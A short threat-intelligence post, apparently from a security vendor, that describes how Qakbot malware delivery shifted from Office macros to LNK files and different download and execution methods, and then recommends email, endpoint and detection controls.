The operators of the Qakbot malware have been observed transforming their delivery vectors in an attempt to evade detection. Qakbot has been a recurring threat since late 2007, evolving from its initial purpose as a banking trojan to a more sophisticated and modular information stealer capable of deploying next-stage payloads such as ransomware.
Initial tactics in early 2022 show Qakbot opting for delivering the malware via XLM 4.0 macros in malicious Microsoft Office documents. These documents would be delivered via phishing emails that commonly contained keywords used for finance and business operations to try and entice the user into opening and executing them. Over the past few months, however, Qakbot has instead opted to use shortcut LNK files as the delivery method for the malware. This decision is likely due to Microsoft’s decision to block macro execution. These latest LNK payloads have also seen shifts in the process executing the main Qakbot DLL, sometimes opting for rundll32.exe instead of regsvr32.exe. The download methodology is also different between recent variants, with powershell.exe sometimes being used to download and execute the main DLL payload as opposed to a combination of cmd.exe and curl.exe being used to download and then execute the file.
These varying methodologies are a clear sign of Qakbot evolving to not only evade security practice and defenses, but also adapt to major changes occurring in infrastructure. It is likely that Qakbot, and other malware, will continue to adapt.
It is highly recommended to implement and maintain appropriate email security controls, including AV scanning and attachment sandboxing, in an environment. Qakbot and other malware frequently use phishing emails as an infection vector, so implementing these types of controls can prevent malicious payloads from reaching any end users. Endpoint security controls, such as an EDR, should also be in place on all systems within an environment. These not only prevent malware from executing properly, but can also be used to alert upon unmitigated malware. All the variants of the Qakbot infection process exhibit behavior that would be considered suspicious under normal circumstances. PowerShell downloading a file from an external source, rundll32 or regsvr32 executing a payload in an abnormal directory, and long command lines containing multiple echo executions are all suspicious behaviors that can be monitored for and alerted upon. Binary Defense’s Managed Detection and Response service is an excellent asset to assist with these types of detection needs.